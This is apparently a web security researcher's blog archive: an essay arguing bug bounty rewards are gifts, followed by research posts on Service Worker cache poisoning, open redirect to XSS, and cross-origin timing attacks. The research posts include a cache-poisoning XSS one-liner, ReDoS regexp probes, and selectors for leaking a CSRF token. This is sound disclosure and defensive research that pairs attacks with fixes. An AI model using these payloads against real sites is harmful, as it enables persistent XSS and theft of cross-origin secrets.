It is my view, that we shouldn't call them "Bug Bounty Programs", I would like them to be called "Bug Hunter Appreciation Programs". I don't like the term "Bug Bounty", because bounty sounds a lot like it's money up for grabs, when the attitude is that of a gift, or a "thank you, you are awesome".

In other words, rewards are gifts, not transactions.

Rewards, in my view, are supposed to show appreciation, and they are not meant to be a price tag. There are many ways to show appreciation, and they can go from a simple "thank you!" in an email or in public, all the way to a job offer or a contract. In fact, I got my first job this way.

For companies, I actually think that the main value reward programs provide isn't the "potential cyber-intelligence capabilities of continuous pentesting" or anything ridiculous like that, but something a lot simpler: to build and maintain a community around you, and you do that by building relationships.

Users

Think about it this way. These bug hunters are also users of the products they found bugs on, and then these users go and make these products better for everyone else. And in return, the companies "thank" these users for their help for making it better not just for them, but for everyone.

These users also, eventually, become more familiar with these products than the developers themselves, and that is without even having access to the source code. These users will know about all the quirks of the product, and will know how to use them to their advantage. These are not power users, they are a super-powered version of a user.

And reward programs were built for these users, for those that did it back when money wasn't involved. They are there as a sign of appreciation and a way to recognize the value of the research.

Recognition

The traditional way of saying "thanks" for vulnerability research has been recognition. For recognition to be valuable it doesn't necessarily have to come from the affected product or company, but rather it could come from the press, or from others in the community. Having your bug be highlighted as a Pwnie is nice, for example, even more so than a security bulletin by the affected company.

More recently, it's more common to have money be used to supplement recognition (and some companies apparently also use it to replace recognition, requiring the researcher not to talk about the bug, or not to speak badly of the affected company). It's quite interesting that this isn't usually highlighted, but I think it's quite important. For many of us, recognition is more important than money, if anything because we depend so much on working with and learning from others that silence diminishes the value of our work.

Money

One question that I don't see asked often enough is: How to decide reward amounts?

First of all, let's consider that they are gifts, not price tags. If you could come up with a gift that feels adequate for a user that is going out of their way to make (your) product better for everyone, what would it be?

It might very well be that it isn't money! Maybe it is free licenses for your product, or invitations to parties or conferences. Maybe it's just an invite to an unreleased product. Doing this at scale, though, might prove difficult... so if you have to use money, maybe start with what it costs to go out one night for dinner and a movie, or so. You can take that and go from there to calculate higher rewards.

This is one of the reasons I don't really like "micro rewards" of $10 USD or so. Because while they are well-intentioned, they also convey the wrong message. I do realize they are valuable in bulk (products that give out these micro rewards usually have a lot of low hanging fruit), but rewarding individual bugs with low rewards also gives the feeling you are just being used for crowdsourcing, or as a "Bulk Bounty".

In any case, I appreciate this is mostly the wrapping of the message being delivered, but I think the message matters when you are dealing with money. The difference between you being "the user" and you being "the product" changes the perception and relationship between companies and users.

Trust

Two of the most important aspects of any relationship are trust and respect. Coming back to the point earlier about money, I really like to see how "no reward" responses are written in different companies, because they show how much they feel like a transaction, and how much they feel like appreciation.

Maybe somewhat counter-intuitively for some, trust goes both ways. Trusting bug hunters makes response teams more trustworthy, and vice versa. It means accepting the possibility that you are wrong and made a mistake when reporting a bug (even if the bug seems to be valid, maybe you are wrong!), and the other way around when handling a bug (even if the bug seems to be invalid, maybe it is valid!). This is particularly important when communicating disagreements.

In any case, whatever the decision was, just saying "thanks" goes a long way. Even the slightest hint of disrespect can ruin an otherwise strong relationship, especially in a medium as cold as email. What is even better is to be transparent about the rationale for the "no reward" response. This is difficult, logistically, as "no reward" decisions are the bulk of the responses sent by any program, but doing a good job here goes a long way toward fostering trust.

Help

At the end of the day, a vulnerability report in a product is simply an attempt at helping the product. Such help sometimes is not welcomed by some ("best bug is unknown bug") and sometimes it's not helpful at all (invalid reports, for example), but in any case, it's help. Accepting help when you need it, saying thanks when you don't, and then helping back when you can is essentially team work.

Another aspect is that sometimes you can reciprocate a vulnerability report with help. If a bug hunter seems lost or started off the wrong way, a little nudging and education can go a very long way. In fact, this is one of the most amazing realizations I've had in these past 4 years. The most insistent researchers that send the most reports, are also the most enthusiastic and eager to learn.

Investing some time helping via coaching and education rather than just depending on automated advice or scoring and rankings helps to create and grow a community. These bug hunters want to help, why don't you help them? It needs time and patience, but it will be worth it. Some small amount of personal feedback is all that is needed. You can't automate relationships.

Challenges

Finally, something amazing happened. Some Bug Hunters started getting a reasonable amount of money out of this! While these programs were originally created to be more like winning the lottery, some very talented individuals actually became really good at this.

The consequences are actually quite interesting. If you can have a sustainable life off white hat vulnerability research, you also become more dependent on these relationships than ever, and trust becomes a critical aspect for sustaining this relationship in the long term. Transparency and clarity on decisions and consistency suddenly become not just best practices but guiding principles.

Another interesting challenge is that of long term planning. It might make you more efficient at finding bugs to do so every day, but companies really want to eventually make finding these bugs harder and harder. This also creates some uncertainty about your future, and how to sustain this for a long time.

Then there are other challenges. These programs are quite unique, and explaining them can be challenging for their legal and fiscal implications. I still remember when I got my first reward from Mozilla, it was a bit awkward explaining to my bank why I had money being sent from abroad. I can just imagine having to do this every couple of weeks; it would be crazy.

Conclusions

It's not about the money. It is about working together and keeping us all safe.
  • If you feel your reward wasn't as high as you expected, maybe your bug's impact wasn't understood correctly, and that also might mean it was fixed incorrectly. Make sure there are no misunderstandings.
  • If there are no misunderstandings, then take the reward as what it is - a gift. It's not a bill for your time, it's not a price for your silence, it's not a bid for your bug's market price. It's just a thank you.
  • If you don't get credit for the bug you found, but you think it is a cool bug, then get credit for yourself! Blog about it, and share it with your peers. Make sure the bug is fixed (or at least give a heads up before making it public, if it's not gonna be fixed quickly).
Bug hunters are also users. Delight them with excellent customer service. Money is just a way to say thank you, it isn't an excuse to have them do work.
  • Appreciation, Recognition and Transparency (ART) are the pillars of a well ran security response program.
  • If you find yourself buried in low quality reports, invest some time to help them. Ignoring the problem won't make it go away.
  • Invest as much time as possible knowing about your community. Meet them face to face, invite them for dinner! Bug hunters are and will always be your most valuable users (including those that just started learning).


Wednesday, May 27, 2015

[Service Workers] Secure Open Redirect becomes XSS Demo

This is the shortest delay between blog posts I've had in a while, but I figured that since my last post had some confusing stuff, it might make sense to add a short demo. The demo application has three things that enable the attack:

  1. An open redirect. Available at /cgi-bin/redirect?continue=.
  2. A Cache Service Worker. Available at /sw.js.
  3. A page that embeds images via <img crossorigin="anonymous" src="" />.
And the attacker's site has one thing:
  1. A CORS enabled attack page. Available at /cgi-bin/attack.
Let's do the attack then! For it to work we need two things to happen:
  • The service worker must be installed.
  • A request to our attack page must be cached with mode=cors.
Our index.html page will do both of those things for us.
Poison Cache

Image URL:



When you click submit above the following things will happen:
  1. A service worker will be installed for the whole origin.
  2. An image tag pointing to the open redirect will be created.
  3. The service worker will cache the request with the CORS response of the attacker.
If all went well, the page above should be "poisoned", and forever (or until the SW updates its cache) you will get the XSS payload. Try it (note that you must have first "poisoned" the response above; if you click the button below before poisoning the cache first, you will ruin the demo forever, since an opaque response will get cached ;):
If the demo doesn't work for you, that probably means you navigated to the attack page before caching the CORS response. If that's the case, you will need to clear the cache first.

Note you need Chrome 43 or later for this to work (or a nightly version of Firefox with the flags flipped). Hope this clarifies things a bit!

Monday, May 25, 2015

[Service Workers] New APIs = New Vulns = Fun++


Just came back from another great HackPra Allstars, this time in the beautiful city of Amsterdam. Mario was kind enough to invite me to ramble about random security stuff I had in mind (and this year it was Service Workers). The presentation went OK and it was super fun to meet up with so many people, and watch all those great presentations.

In any case, I promised to write a blog post repeating the presentation in written form. However, I was hoping to watch the video first to see what mistakes I might have made and correct them in the blog post, and the video is not online yet. So, until then, today's post is about something that wasn't mentioned in the talk.

This is about the types of vulnerabilities that applications using Service Workers are likely to create. To start, I just want to say that I totally love Service Workers! Its APIs are easy to use and understand, and the debugging tools in Chrome are beautiful and well done (very important since tools such as Burp or TamperChrome wouldn't work as well with offline apps, as no requests are actually made). You can clearly see that a lot of people have thought a lot about this problem, and there is some serious effort around making offline application development possible.

The reason this blog post's content wasn't part of the presentation is because I thought it already had too much content, but if you don't know how Service Workers work, you might want to see the first section of the slides (as it's an introduction), or you can read this article or watch this video.

Anyway, so back to biz.. Given that there aren't many "real" web applications using Service Workers, I'll be using the service-worker samples from the w3c-webmob, but as soon as you start finding real service worker usage take a look and let me know if you find these problems too!

There are two main categories of potential problems I can see:
  1. Response and Caching Issues
  2. Web JavaScript Web Development

Response and Caching Issues

The first "category" or "family" of problems are response and caching issues. These are issues that are present because of the way responses are likely to be handled by applications.

Forever XSS

The first problem, which is probably kind-of bad, is the possibility of making a reflected XSS into a persistent XSS. We've already seen this type of problem based on APIs like localStorage before, but what makes this different is that the Cache API is actually designed to do exactly that!

When the site is about to request a page from the web, the service worker is consulted first. The service worker at this point can decide to respond with a cached response (its logic is totally delegated to the Service Worker). One of the main use-cases for service workers is to serve a cached copy of the request. This cache is programmatic and totally up to the application to decide how to handle it.

One coding pattern for Service Workers is to respond with whatever is in the cache, if available, or to make a request if not (and cache the response). In other words, in those cases, no request is ever made to the server if the request matches a cached response. Since this Cache database is accessible to any JS code running in the same origin, an attacker can pollute the Cache with whatever they want, and have the client serve the malicious XSS forever!
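
For reference, the cache-first pattern in question looks roughly like this (a simplified sketch of the common sample code, reusing the cache name from the demo below); note that nothing here checks where a cached response actually came from:

  self.addEventListener('fetch', function(e) {
    e.respondWith(
      caches.open('prefetch-cache-v1').then(function(cache) {
        return cache.match(e.request).then(function(cached) {
          if (cached) return cached;  // served forever, never re-validated
          return fetch(e.request).then(function(response) {
            cache.put(e.request, response.clone());  // poisonable by same-origin JS
            return response;
          });
        });
      })
    );
  });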

If you want to try this out, go here:

Then fake an XSS by typing this to the console:
caches.open('prefetch-cache-v1').then(function(cache){cache.put(new Request('index.html', {mode: 'no-cors'}), new Response('\x3cscript>alert(1)\x3c/script>', {headers: {'content-type': 'text/html'}}))})

Now whenever you visit that page you will see an alert instead! You can use Control+Shift+R to undo it, but when you visit the page again, the XSS will come back. It's actually quite difficult to get rid of this XSS. You have to manually delete the cache :(.

This is likely to be an anti-pattern we'll see often in new Service Worker-enabled applications. To prevent this, one of the ideas from Jake Archibald is to simply check the "url" property of the response. If the URL is not the same as the request's, then simply don't use it, and discard it from the cache. This idea is quite important actually, and I'll explain why below.
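
A sketch of that check (the helper name is mine): before serving a cached entry, verify the response really came from the URL that was requested, and drop it otherwise:

  // Discard any cached response whose url doesn't match the request, and
  // fall back to the network in that case.
  function matchSafely(cache, request) {
    return cache.match(request).then(function(cached) {
      if (cached && cached.url !== request.url) {
        cache.delete(request);  // someone put something fishy in here
        cached = undefined;
      }
      return cached || fetch(request);
    });
  }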

When Secure Open Redirects become XSS

A couple years ago in a presentation with thornmaker we explained how open redirects can result in XSS and information leaks, and they were mostly limited to things such as redirecting to insecure protocols (like javascript: or data:). Service Workers, however, and in specific some of the ways that the Cache API is likely to be used, introduce yet another possibility, and one that is quite bad too.

As explained before, the way people seem to be coding over the Cache API is by reading the Request, fetching it, and then caching the Response. This is tricky, because when a service worker renders a response, it renders it from the same origin it was loaded from.

In other words.. let's say you have a website that has an open redirect..
  • https://www.example.com/logout?next=https://www.othersite.com/
And you have a service worker like this one:
  • https://googlechrome.github.io/samples/service-worker/read-through-caching/service-worker.js
What that service worker does, like the previous one, is simply cache every request that goes through it by re-fetching it and storing the response. So if the open redirect above is fetched while pointing to evilwebsite.com, the service worker will follow the redirect and cache the response from evilwebsite.com for the example.com request!

That means that next time the user goes to:
  • https://www.example.com/logout?next=https://www.evilwebsite.com
The request will be cached and instead of getting a 302 redirect, they will get the contents of evilwebsite.com.

Note that for this to work, evilwebsite.com must include Access-Control-Allow-Origin: * as a response header, since otherwise the request won't be accepted. You also need to make the request CORS-enabled (with a cross-origin image or embed request, for example).

This means that an open redirect can be converted into a persistent XSS, and it's another reason why checking the url property of the Response is so important before rendering it (both for responses coming from the Cache and for code like event.respondWith(fetch(event.request))). Even if you have never had an XSS, you can introduce one by accident. If I had to guess, almost all usages of Service Workers will be vulnerable to one variation or another of these attacks if they don't implement the response.url check.

There's a bunch of other interesting things you can do with Service Workers and Requests / Responses, mentioned in the talk and that I'll try to blog about later. For now though, let's change subject.

Web JavaScript Web Development

This will sound weird to some, but the JavaScript APIs in the browser don't actually include any good APIs for building web responses. What this means is that Service Workers will now be kind-of like web servers, but they are being put there without any APIs for secure web development, so it's likely they will introduce a bunch of cool bugs.

JavaScript Web APIs aren't Web Service APIs


For starters, the default concerns are the things that already affect existing JS-based server applications (like Node.js): from RegExp bugs, because the JS APIs aren't secure by default, to things like the JSON API's lack of encoding.

But another more interesting problem is that the lack of templating APIs in Service Workers means people will write code like this, which of course means it's gonna be full of XSS. And while you could import a templating library with strict contextual auto-escaping, the lack of a default library means people are likely to use insecure alternatives or just default to string concatenation (note that things like Angular and Handlebars won't work here, because they work at the DOM level, and Service Workers don't have access to the DOM since they run way before the DOM is created).
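To make that concrete, here is a sketch of the string-concatenation anti-pattern I expect to see, together with the kind of minimal escaping helper each developer will have to remember to write themselves (the handler, the parameter name and escapeHtml are all made up for illustration):

// Anti-pattern: building an HTML Response by string concatenation in a Service Worker.
self.addEventListener('fetch', function(event) {
  var name = new URL(event.request.url).searchParams.get('name') || '';
  // Vulnerable: 'name' goes straight into the markup.
  var html = '<h1>Hello ' + name + '</h1>';
  event.respondWith(new Response(html, {headers: {'content-type': 'text/html'}}));
});

// A hand-rolled helper; without a default templating library, every developer
// has to remember to write (and consistently use) something like this.
function escapeHtml(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;')
          .replace(/>/g, '&gt;').replace(/"/g, '&quot;');
}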

It's also worth noting that the asynchronous nature of Service Workers (event-driven and promise-based), combined with developers who aren't used to it, is extremely likely to introduce concurrency vulnerabilities in JS if people abuse the global scope. That isn't common today, but it's very likely to become so soon.

Cross Site Request Forgery


Another concern is that CSRF protection will have to behave differently for Service Workers. In particular, Service Workers will most likely have to depend more on referrer/origin based checks. This isn't bad in and of itself, but mixing it with offline web applications will most likely pose a challenge. Funnily, none of the demos I found online have CSRF protection, which highlights the problem, but also makes it hard for me to give you examples of why it's gonna be hard.

To give a specific example: if a web application is meant to work while offline, how would such an application keep track of CSRF tokens? Once the user comes back online, it's possible the CSRF tokens won't be valid anymore, and the offline application will have to handle that gracefully. While handling the fallback correctly is possible by simply doing different checks depending on the online state of the application, it's likely more people will get it wrong than right.
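As a rough illustration of the kind of bookkeeping this forces on the page, something like the following could refresh the token when connectivity returns (the /csrf-token endpoint and the storage key are hypothetical):

// In the page: when connectivity comes back, fetch a fresh CSRF token before
// replaying any work that was queued while offline.
window.addEventListener('online', function() {
  fetch('/csrf-token', {credentials: 'include'})
    .then(function(r) { return r.text(); })
    .then(function(token) {
      localStorage.setItem('csrftoken', token);
      // ...then replay the queued requests with the new token.
    });
});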

Conclusion

I'm really excited to see what type of web applications are developed with Service Workers, and also about what type of vulnerabilities they introduce :). It's too early to know exactly, but some anti-patterns are clearly starting to emerge, either as a result of the API design or of the existing mental models in developers' heads.

Another thing I wanted to mention before closing up is that I'll start experimenting with writing some of the defensive security tools I mentioned in the talk. If you want to help out as well, please let me know!

Saturday, May 31, 2014

[Matryoshka] - Web Application Timing Attacks (or.. Timing Attacks against JavaScript Applications in Browsers)

Following up on the previous blog post about the wrapping overflow leak on frames, this one is also about the presentation Matryoshka that I gave in Hamburg at HackPra All Stars 2013, during Appsec Europe 2013.

The subject today is web application timing attacks. The idea is to show a couple of techniques for attacking another website by using timing. Timing attacks are very popular in cryptography, and usually focus on either remote services or local applications. Recently they've become a bit more popular, and are being used to attack browser security features.


Today the subject I want to discuss is not attacking the browser or the operating system, but rather other websites. Specifically, I want to show you how to perform timing attacks cross-domain whenever a value you control is used by another web application.


The impact of successfully exploiting this vulnerability varies depending on the application being attacked. To be clear, what we are attacking are JavaScript-heavy applications that handle data somehow controlled by another website, such as cookies, the URL, the referrer, postMessage, and so on.


Overall though, the attack itself isn't new, and the application of the attack on browsers is probably predictable.. but when discussed it's frequently dismissed as unexploitable, or unrealistic. Now, before I get your hopes up, while I think it's certainly exploitable and realistic, it isn't as straightforward as other attacks.


We know that you can obviously tell whether your own code runs faster or slower, but, as some of you might want to correct me, that shouldn't matter. Why? Well, because of the Same Origin Policy. In case you are not aware, the Same Origin Policy dictates that https://puppies.com can't interact with https://kittens.com. It defines a very specific subset of APIs where communication is safe (like, say, navigation, postMessage, or CORS).

The general wisdom says that to be vulnerable to information leak attacks, you need to opt-in to be vulnerable to them. That is, you have to be doing something stupid for stupid things to happen to you. For example, say you have code that runs a regular expression on some data, like:

onmessage = function(e) {
    // Run the attacker-supplied regular expression over the page contents
    // and tell the sender whether it matched.
    if (document.body.innerHTML.match(new RegExp(e.data))) {
        e.source.postMessage('got a match!', e.origin);
    }
}

Well, of course it will be possible to leak information.. try it out here:

  • The secret is 0.0
  • The secret is 0.1
  • The secret is 0.2
  • ...
  • The secret is 0.9


You can claim this code is vulnerable and no one would tell you otherwise. "You shouldn't be writing code like this (tm)".

Now, what about this?

onmessage = function(e) {
    // Same as before, but always respond with 'finished', match or not.
    if (document.body.innerHTML.match(new RegExp(e.data))) {
        console.log('got a match');
    }
    e.source.postMessage('finished', e.origin);
}

Well, now it's tricky, right? In theory, this script isn't leaking any information to the parent page (except of course, how long it took to run the regular expression). Depending on who you ask, they will tell you this is a vulnerability (or.. not).

Now, it clearly is vulnerable, but let's figure out exactly why. There is one piece of information that is leaked, and that is, how long it took to run the regular expression. We control the regular expression, so we get to run any regular expression and we will get to learn how long it took to run.

If you are familiar with regular expressions, you might be familiar with the term "ReDoS", a class of Denial of Service attacks that exploit regular expressions whose worst case runs in exponential time. You can read more about it here. Well, the general premise is that you can make a regular expression take forever if you want to.

So, with that information, we can do the same attack as before, but this time, we will infer if we had the right match simply by checking if it took over N seconds to respond to our message, or well... if it returned immediately.
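A minimal sketch of how the attacker side could measure that round trip (the iframe id and the candidate regexp are just placeholders):

// Attacker page: time how long the victim frame takes to answer our message.
var frame = document.getElementById('victim'); // iframe pointing at the target page
function probe(regexp) {
  return new Promise(function(resolve) {
    var start = performance.now();
    window.addEventListener('message', function handler(e) {
      window.removeEventListener('message', handler);
      resolve(performance.now() - start);
    });
    frame.contentWindow.postMessage(regexp, '*');
  });
}
// A guess is "right" when the ReDoS suffix makes the response take much longer.
probe('The secret is 0.1[0-9.]+(.{0,100}){12}XXX').then(function(ms) {
  console.log('took', ms, 'ms');
});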

Let's give it a try:


  • The secret is 0.0[0-9.]+(.{0,100}){12}XXX
  • The secret is 0.1[0-9.]+(.{0,100}){12}XXX
  • The secret is 0.2[0-9.]+(.{0,100}){12}XXX
  • ...
  • The secret is 0.9[0-9.]+(.{0,100}){12}XXX



Did you notice that the right answer took longer than the others?

If you are an average security curmudgeon you will still say that the fault lies with the vulnerable site, since it's opting in to leak how long it took to run the regular expression. All developers are supposed to take care of these types of problems, so why not JavaScript developers?

Alright then, let's fix up the code:
onmessage = function(e) {
    if (document.body.innerHTML.match(new RegExp(e.data))) {
        console.log('got a match');
    }
}

That clearly has no feedback loop back to the parent page. Can we still attack it?

Well, now it gets tricky. When I told you that the Same Origin Policy isolates kittens.com from puppies.com, I wasn't being totally honest. The JavaScript code from both kittens.com and puppies.com runs in the same thread. That is, if you have 3 iframes, one pointing to puppies.com, one pointing to kittens.com and one pointing to snakes.com, then all of them run in the same thread.

Said another way, if snakes.com suddenly decides to run into an infinite loop, neither puppies.com nor kittens.com will be able to run any JavaScript code. Don't believe me? Give it a try!





Did you notice that when you looped the "snakes", the counters in the other two iframes stopped? That's because the snakes, the puppies, and the kittens all run in the same thread, and if one script keeps the thread busy, all the other scripts are paused.

Now, with that piece of information, a whole new world opens up for us. We don't need the other page to surrender any information to us; simply because its code runs in the same thread we do, we can guess how long that code takes to run!

One way to attack this is to simply ask the browser to run a specific piece of code every millisecond; whenever our code doesn't run on time, that means some other code was keeping the interpreter busy. We keep track of these delays, and from them we learn how long the other code took to run.
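Something along these lines (a sketch; browsers clamp timer resolution, so this is coarser than what a real exploit would use):

// Monitor how busy the shared event loop is: schedule a callback every
// millisecond and record how late each one actually fires.
var last = performance.now();
var delays = [];
setInterval(function() {
  var now = performance.now();
  // If another origin's script kept the thread busy, now - last grows.
  delays.push(now - last);
  last = now;
}, 1);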

Alright, but you might feel a bit disappointed, since it's really not common to have code that runs regular expressions on arbitrary content.. so this attack is kinda lame..

Well, not really. Fortunately there are plenty of web applications that will run all sorts of interesting code for us. When I described the attack to Stefano Di Paola (the developer of DOMinator), he told me he had always wanted to figure out what you could do with code that does jQuery(location.hash). This used to be an XSS, but then jQuery fixed it, so no more XSS: if the string starts with a '#', it is forced to be treated as a CSS selector.

He said that perhaps jQuery could leak timing information based on how long it took for it to run a specific selector over the code. I told him that was a great idea, and started looking into it. Turns out, there is a "contains" selector in jQuery that will essentially look at all the text content in the page and try to figure out what nodes "contain" such text.

It essentially finds a node, serializes its text contents, and then searches for the value inside it. In a nutshell it does:

haystack.indexOf(needle);

Which is interesting, but it doesn't have the ReDoS vector we had with regular expressions. Figuring out if there was a match is significantly more complicated: we need to know whether the search in the "haystack" found something (or not), which sounds, well.. complicated.

Can we get such granularity? Is it possible to detect the difference between "aaaa".indexOf("b") and "aaaa".indexOf("a")? There's clearly a running time difference, but the difference is so small we might not be able to measure it.

There is another, even cooler selector: the "string prefix" selector. Say you have something like <input name="csrftoken" value="SECRET"> in the page.

You can match it with:
input[name=csrftoken][value^=X]
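If a prefix of the value is already known, extending it one character at a time boils down to generating candidate selectors like these and timing each one (a rough sketch; how each selector is delivered to the victim, e.g. via location.hash, is the part described above):

// Extend a known prefix of the token by one character, producing the
// candidate [value^=...] selectors to try next (delivery not shown).
var alphabet = 'abcdefghijklmnopqrstuvwxyz0123456789';
function candidates(knownPrefix) {
  return alphabet.split('').map(function(c) {
    return 'input[name=csrftoken][value^=' + knownPrefix + c + ']';
  });
}
console.log(candidates('X'));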

But again, this is even more difficult than the indexOf() attack we were doing earlier. The question now is: can we detect string comparisons? Can we get enough accuracy out of performance.now() to know whether a string comparison succeeded?

To make the question clearer.. can we measure in JavaScript the difference between "wrong" == "right" and "right" == "right"?

In theory, it should be faster to compare "wrong" to "right" because the runtime can stop the comparison on the first character, while to be sure that "right" is equal to "right", then it needs to compare every character in the string to ensure it's exactly the same.

This should be easy to test. In the following iframe we make a quick experiment and measure:

  • Time taken to compare "aaaa.....a" (200k) to "foobar"
  • Time taken to compare "aaaa.....a" to "aaaa.....a"
We make the comparison 100 times to make the timing difference more explicit.
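A sketch of what that experiment boils down to (exact numbers depend on the machine and the engine):

// Compare a 200k-character string against an equal copy, and against a
// short, obviously different string, 100 times each.
var long1 = new Array(200001).join('a');   // 200,000 'a's
var long2 = new Array(200001).join('a');
var other = 'foobar';

function time(label, a, b) {
  var start = performance.now();
  var result;
  for (var i = 0; i < 100; i++) { result = (a == b); }
  console.log(label, (performance.now() - start).toFixed(1) + 'ms', result);
}

time('aaa..a == foobar :', long1, other);
time('aaa..a == aaa..a :', long1, long2);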

Unless something's gone totally wrong, you should see something like:
aaa..a == foobar : 0ms
aaa..a == aaa..a : 60ms
These strange-looking results mean, mostly, that comparing two equal long strings takes significantly more time than comparing two obviously different strings. The "obviously", as we will learn, is the tricky part.

What the JavaScript runtimes do is first try to take a shortcut: if the lengths are different, they return false immediately. If the lengths are the same, on the other hand, they compare char-by-char, and as soon as they find a character that doesn't match, they return false.
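In other words, the comparison behaves roughly like this simplified sketch (real engines add interning and other tricks on top):

// Roughly what a string equality check does under the hood (simplified).
function stringEquals(a, b) {
  if (a.length !== b.length) return false;  // cheap shortcut
  for (var i = 0; i < a.length; i++) {
    if (a[i] !== b[i]) return false;        // bail out at the first mismatch
  }
  return true;                              // equal strings pay the full cost
}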

But is it significant? And if so, how significant? To try and answer that question I ran several experiments. For instance, it's 2-10 times faster to make a "false" comparison than a "true" comparison with just 18 characters. That means "xxxxxxxxxxxxxxxxxx" == "xxxxxxxxxxxxxxxxxx" runs 2 to 10 times slower than "xxxxxxxxxxxxxxxxxx" == "yyyyyyyyyyyyyyyyy". To be able to detect that, however, we need a lot of comparisons and a lot of samples to reduce noise. In this graph you can see how many thousands of iterations you need for the measurement to "stabilize".

What that graph means is that after 120,000 iterations (that is, 120,000 comparisons), the difference between "xxxxxxxxxxxxxxxxxx" == "yyyyyyyyyyyyyyyyy" and "xxxxxxxxxxxxxxxxxx" == "xxxxxxxxxxxxxxxxxx" is stable at about 6 times slower. And, to be clear, that is with all 18 characters being different, which means that to notice the 6X difference you would need to bruteforce the 18 characters at once. Even in the most optimistic scenarios, bruteforcing 18 characters is way out of the question.

If you try to repeat the experiment with just 2 characters, the results are significantly different (note this graph rounds results to the closest integer). You won't be able to notice any difference.. at all. The line is flat up to a million iterations. That means that a million comparisons of "aa" vs "bb" run in about the same amount of time as a million comparisons of "aa" vs "aa" (not as impressive as our 6X!).

But.. we don't always need impressive differences to be able to make a decision (see this graph without the rounding). With just two characters, the difference looks roughly like this: the true comparison usually runs in exactly the same time, sometimes a tiny bit faster, but also many times slightly slower. In essence, it seems to take about 1.02 times as long as a false comparison.

Now, the fact this graph looks so messy means our exploit won't be as reliable, and will require significantly more samples to detect any changes. We now have in our hands a probabilistic attack.

To exploit this, we will need to perform the attack a couple hundred, a couple thousand, or a couple million times (this actually depends on the machine: a slow machine shows more measurable differences but also more noise, while a fast machine shows smaller differences but lets us take more accurate measurements).

With the samples, we either average the results, take the mean of means (which needs a lot of samples), run a chi-squared test if we know the variance, or a Student's t-test if we can assume a normal distribution (JavaScript's garbage collector skews things a bit).
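For instance, a rough sketch of the mean-of-means approach over the collected samples:

// Summarize many timing samples by the mean of per-batch means, which
// dampens outliers such as GC pauses and scheduling noise.
function meanOfMeans(samples, batchSize) {
  var means = [];
  for (var i = 0; i + batchSize <= samples.length; i += batchSize) {
    var batch = samples.slice(i, i + batchSize);
    means.push(batch.reduce(function(a, b) { return a + b; }, 0) / batch.length);
  }
  return means.reduce(function(a, b) { return a + b; }, 0) / means.length;
}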


At the end of the day, I ended up creating my own test, and was able to brute force a string in a different origin via code that does:

if (SECRET == userSupplied) {
   // do nothing
}

Here are some results on string comparison on Chrome:
  • It is possible to bruteforce an 18-digit number in about 3 minutes on most machines.
    • Without the timing attack you would need to perform 5 quadrillion comparisons per second. With the timing attack you only need 1 million.
  • It is possible to reliably recover a 9-character alphanumeric string in about 10 minutes.
    • This differs from the number case because here we have a 37-character alphabet, while with numbers it's just 10.
If you are interested in playing around with it, and you have patience (a lot of patience!), check this and this. They will literally take 5-10 minutes to run, and they simply try to order 7 strings according to the time they took to compare. Both of them run about a million string comparisons using window.postMessage as the input, so it takes a while.

If you have even more patience you can run this, which will try different combinations of iterations/samples to figure out which works best (slow machines work better with fewer iterations and more samples, faster machines do best with more iterations and fewer samples).

So, summary!
  • Timing attacks are easy thanks to JavaScript's single-threadedness. That might change with things like process isolation, but it will continue to be possible for the time being.
  • String comparison can be measured and attacked, but it's probabilistic and really slow with the existing attacks.
Let me know if you can improve the attack (if you can get it under 1 minute for an 18-digit number you are my hero!), find a problem in the sampling/data, or otherwise manage to generalize the ReDoS exploit to string comparison / indexOf operations :)

Another attack that might be worth discussing relies on the fact that strings from different origins are stored in the same hash table. This means that if we were able to distinguish a hashtable miss from a hashtable match, we could read strings cross-origin.

I spent a lot of time trying to make that work, but it didn't work out. If you can do it, let me know as well :)

Thanks for reading!